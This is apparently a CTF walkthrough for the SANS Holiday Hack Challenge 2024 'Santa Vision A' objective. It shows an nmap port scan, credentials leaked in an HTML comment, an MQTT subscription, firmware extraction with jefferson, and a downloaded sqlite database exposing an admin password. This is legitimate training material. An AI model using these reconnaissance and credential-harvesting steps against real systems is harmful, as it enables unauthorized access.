SANS Holiday Hack Challenge 2024 - Act 3

Santa Vision A

Difficulty: ❄ ❄ ❄ ❄ ❄
What username logs you into the SantaVision portal?

Hints

Misplaced Credentials

From: Ribb Bonbowford
Objective: Santa Vision A
See if any credentials you find allow you to subscribe to any MQTT feeds.

Filesystem Analysis

From: Ribb Bonbowford
Objective: Santa Vision A
jefferson is great for analyzing JFFS2 file systems.

Database Pilfering

From: Ribb Bonbowford
Objective: Santa Vision A
Consider checking any database files for credentials…

Mosquito Mosquitto

From: Ribb Bonbowford
Mosquitto is a great client for interacting with MQTT, but their spelling may be suspect. Prefer a GUI? Try MQTTX

Silver

As a first step, I tried to discover the ports opened on the server with nmap:

1
2
3
4
5
6
7
8
9
10
11
12
thedead@maccos act3-SantaVision % nmap 34.44.88.211 -p-
Nmap scan report for 211.88.44.34.bc.googleusercontent.com (34.44.88.211)
Host is up (0.16s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT     STATE    SERVICE
22/tcp   open     ssh
1883/tcp open     mqtt
5355/tcp filtered llmnr
8000/tcp open     http-alt
9001/tcp open     tor-orport

Nmap done: 1 IP address (1 host up) scanned in 3165.46 seconds

Reaching the website on http://34.56.1.154:8000, I got presented with a login page:

This was easily bypassed by looking at the html source and noticing leftover credentials in the comment:

1
2
3
<div class="footer" id="footer">
  <b>©2024 Santavision Elventech Co., Ltd. Snow Rights Reserved.<br>(<i>topic 'sitestatus'</i> available.)</b>
</div> <!-- mqtt: elfanon:elfanon -->

Login with user elfanon and password elfanon is successful, with elfanon being the answer to the silver trophy.

Gold

Following the message (topic 'sitestatus' available.) in the footer, I connected as elfanon using mosquitto to the sitestatus feed. Among the other messages, one was particularly interesting:

1
2
3
4
thedead@maccos act3-SantaVision % mosquitto_sub -v -h 34.44.88.211 -p 1883 -u elfanon -P elfanon -t 'sitestatus'
# ...omissis...
sitestatus File downloaded: /static/sv-application-2024-SuperTopSecret-9265193/applicationDefault.bin
# ...omissis...

Once downloaded the file /static/sv-application-2024-SuperTopSecret-9265193/applicationDefault.bin it can be extracted with jefferson and its contents explored:

1
2
3
4
5
6
7
8
9
10
thedead@maccos act3-SantaVision % wget http://34.44.88.211:8000/static/sv-application-2024-SuperTopSecret-9265193/applicationDefault.bin
# ... omisssis ... 
2024-12-23 12:27:10 (687 KB/s) - ‘applicationDefault.bin’ saved [7340032/7340032]
(act3-SantaVision) thedead@maccos act3-SantaVision % jefferson applicationDefault.bin 
dumping fs to /Users/thedead/Desktop/repos/SANS_HolidayHack/2024/act3-SantaVision/jffs2-root (endianness: <)
# ... omisssis ... 
writing S_ISREG app/src/accounts/views.py
# ... omisssis ... 
writing S_ISREG app/src/core/views.py
# ... omisssis ...

Looking at the file app/src/accounts/views.py, I found the reference to a sqlite DB:

1
2
3
4
# ... omisssis ... 
@accounts_bp.route("/sv2024DB-Santa/SantasTopSecretDB-2024-Z.sqlite", methods=["GET"])
def db():
    return send_from_directory("static", "sv2024DB-Santa/SantasTopSecretDB-2024-Z.sqlite", as_attachment=True)

Downloading this file and exploring it, I found the user santaSiteAdmin:

1
2
3
4
5
6
7
8
9
(act3-SantaVision) thedead@maccos act3-SantaVision % wget http://34.44.88.211:8000/static/sv2024DB-Santa/SantasTopSecretDB-2024-Z.sqlite
# ... omisssis ... 
2024-12-23 12:35:35 (80.2 KB/s) - ‘SantasTopSecretDB-2024-Z.sqlite’ saved [20480/20480]
(act3-SantaVision) thedead@maccos act3-SantaVision % sqlite3 SantasTopSecretDB-2024-Z.sqlite 
# ... omisssis ... 
sqlite> .tables
alembic_version  users          
sqlite> SELECT * FROM users;
1|santaSiteAdmin|S4n+4sr3411yC00Lp455wd|2024-01-23 06:05:29.466071|1

Leveraging on the santaSiteAdmin credentials I could login to the web page again, with santaSiteAdmin being the answer to the gold trophy.